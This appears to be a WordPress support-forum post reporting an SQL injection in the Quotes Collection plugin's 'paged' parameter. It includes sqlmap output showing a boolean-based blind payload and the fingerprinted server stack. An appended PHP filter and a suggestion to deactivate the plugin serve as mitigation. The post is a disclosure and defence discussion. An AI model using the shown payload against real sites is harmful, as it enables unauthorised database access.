quotes-collection
The Quotes Collection Plugin has an SQL injection vulnerability
There is an SQL injection vulnerability at the 'page' parameter.

POC:


sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:

Parameter: paged (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=quotes-collection&s=&_wpnonce=6451483bd1&action=make_public&paged=1 AND 8236=8236&bulkcheck[]=1

[16:57:38] [INFO] testing MySQL
[16:57:38] [INFO] confirming MySQL
[16:57:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 8
web application technology: Apache 2.4.37, PHP 7.2.24
back-end DBMS: MySQL >= 5.0.2
I read on the WordPress contributor forum that this project is currently unable to manage this project because of busyness. I am not a proficient programmer, but is there a temporary way so that this vulnerability cannot be utilized? Or do we have to disable or even delete these plugins while we wait for the code update? Thanks.
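One temporary way to reject the request shape shown in the sqlmap output before the plugin sees it, as an added example that is not part of the original post or the plugin's own code. It assumes the injectable value reaches the plugin only through the `paged` request parameter on `page=quotes-collection`, as the output above reports; the file name and function name are hypothetical.

```php
<?php
/**
 * Added example (not the plugin's code): temporary request filter.
 * Save as wp-content/mu-plugins/qc-paged-guard.php (hypothetical file name);
 * WordPress loads files in mu-plugins before any regular plugin runs.
 *
 * Assumption: the only injectable input is the `paged` parameter sent
 * together with page=quotes-collection, as in the sqlmap output.
 */

/**
 * Return true when the request may proceed to the plugin.
 * Each source ($_GET, $_POST) is checked on its own, so a clean value in
 * one source cannot mask a malicious value in the other.
 */
function qc_guard_request_is_safe(array ...$sources): bool
{
    $targets_plugin = false;
    foreach ($sources as $src) {
        if (($src['page'] ?? null) === 'quotes-collection') {
            $targets_plugin = true;
        }
    }
    if (!$targets_plugin) {
        return true; // not this plugin's admin screen, leave it alone
    }

    foreach ($sources as $src) {
        if (!array_key_exists('paged', $src)) {
            continue; // no page number in this source
        }
        $paged = $src['paged'];
        // Accept only a short run of ASCII digits. Arrays (paged[]=...) and
        // values such as "1 AND 8236=8236" are rejected.
        if (!is_string($paged) || preg_match('/\A[0-9]{1,9}\z/', $paged) !== 1) {
            return false;
        }
    }
    return true;
}

if (!qc_guard_request_is_safe($_GET, $_POST)) {
    http_response_code(400);
    exit('Invalid paged parameter.');
}
```

This filters only that one parameter; deactivating the plugin removes the vulnerable code path entirely.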